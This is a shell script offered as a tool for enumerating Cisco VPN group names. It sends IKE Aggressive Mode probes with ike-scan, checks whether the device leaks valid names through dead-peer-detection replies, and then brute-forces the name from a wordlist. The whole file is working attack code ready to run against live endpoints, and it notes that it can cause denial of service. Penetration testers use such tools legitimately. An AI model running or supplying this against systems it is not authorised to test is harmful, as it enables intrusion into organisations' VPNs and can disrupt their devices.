groupenum.sh
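#!/bin/sh
######################################################################################
#Cisco group name enumeration
#Requires: ike-scan http://www.nta-monitor.com/tools-resources/security-tools/ike-scan
#Usage: ./groupenum.sh target wordlist.txt
#Disclaimer: I accept no responsibility for any issues caused by running this tool,
#run at your own risk. i.e. it's not my fault if you cause a DoS condition, modify the sleep time accordingly.
#
# How the check works: every probe is one IKE Aggressive Mode exchange (ike-scan -M -A)
# carrying a candidate group name as the ID. The only signal used is whether the device
# answers that ID with a "dead peer" (DPD) notification while a plainly bogus ID gets
# none. A candidate is probed a second time before it is reported so that a single
# stray DPD reply is not taken as a hit.
#
# Exit status: 0 when a group name was found or the device is not affected,
#              1 when the wordlist was exhausted, 2 on a usage error.
######################################################################################

# Seconds to pause after every probe. Raise this on devices that rate-limit IKE or
# fall over under load (see the disclaimer above).
SLEEP_SECS=0.4
# ike-scan options used for every probe. Override these if the device needs a
# specific transform set, e.g. IKE_OPTS="-M -A --trans=7/256,2,1,2".
IKE_OPTS="-M -A"

usage() {
  printf 'Usage: ./groupenum.sh target wordlist.txt\n' >&2
  exit 2
}

#######################################
# Run one aggressive-mode exchange and print ike-scan's output.
# Globals:   IKE_OPTS (read), SLEEP_SECS (read)
# Arguments: $1 - target host, $2 - ID (group name) to present
# Outputs:   ike-scan output on stdout
# Returns:   status of sleep (ike-scan's status is not used by callers)
#######################################
probe() {
  # IKE_OPTS is deliberately unquoted so it splits into separate options.
  # shellcheck disable=SC2086
  ike-scan "$1" $IKE_OPTS --id="$2"
  # Throttle every probe the same way, whichever caller issued it.
  sleep "$SLEEP_SECS"
}

#######################################
# Succeed when the device answers the given ID with a dead-peer notification.
# Arguments: $1 - target host, $2 - ID (group name) to present
# Outputs:   the matching ike-scan line on stdout (grep without -q, as before)
# Returns:   0 if "dead peer" appeared in the reply, non-zero otherwise
#######################################
dpd_reply() {
  probe "$1" "$2" | grep -i "dead peer"
}

main() {
  [ $# -ge 2 ] || usage
  target=$1
  wordlist=$2

  if ! command -v ike-scan >/dev/null 2>&1; then
    printf '[-]ike-scan not found in PATH\n' >&2
    exit 1
  fi
  if [ ! -r "$wordlist" ]; then
    printf '[-]Cannot read wordlist: %s\n' "$wordlist" >&2
    exit 1
  fi

  #Determine if device is vulnerable
  echo "[+]Checking if Aggressive Mode is enabled..."
  # One handshake answers both the aggressive-mode and the vendor check; the
  # original sent the same probe twice.
  handshake=$(probe "$target" admin)
  if ! printf '%s\n' "$handshake" | grep -i "aggressive"; then
    echo "[-]Aggressive mode handshake not returned, try the script a few more times"
    echo "If you know the device accepts aggressive mode modify the script to use the correct transform set by setting IKE_OPTS at the top of the script."
    echo "Example: ike-scan $target -M -A --trans=7/256,2,1,2 --id=test"
    exit 0
  fi
  echo "[+]Aggressive mode enabled, checking device is a Cisco endpoint..."
  if ! printf '%s\n' "$handshake" | grep -i "cisco"; then
    echo "[-]Not a Cisco endpoint"
    exit 0
  fi

  echo "[+]Confirmed Cisco endpoint, checking DPD response..."
  # An ID that cannot exist must NOT draw a DPD reply; if it does, the DPD signal
  # carries no information on this device and the wordlist run would be noise.
  if dpd_reply "$target" thisgroupnamedoesnotexit234585; then
    echo "[-]Device does not appear to be vulnerable"
    exit 0
  fi
  echo "[+]Device appears to be vulnerable"

  #Brute force groupname
  echo "[+]Brute forcing group name with: $wordlist"
  # read -r keeps backslashes; '|| [ -n "$group" ]' keeps a last line that has no
  # trailing newline; blank lines are skipped instead of being sent as an empty ID.
  while IFS= read -r group || [ -n "$group" ]; do
    [ -n "$group" ] || continue
    if dpd_reply "$target" "$group"; then
      echo "False alarm checking for group $group"
      # Re-probe before reporting so one stray DPD reply does not count as a hit.
      if dpd_reply "$target" "$group"; then
        echo "[+]Group name = $group"
        exit 0
      fi
    fi
  done < "$wordlist"

  echo "[+]Trying IP address as group name: $target"
  if dpd_reply "$target" "$target"; then
    echo "[+]Group name = $target"
    exit 0
  fi

  echo "[-]Group name not found - try a better wordlist"
  exit 1
}

main "$@"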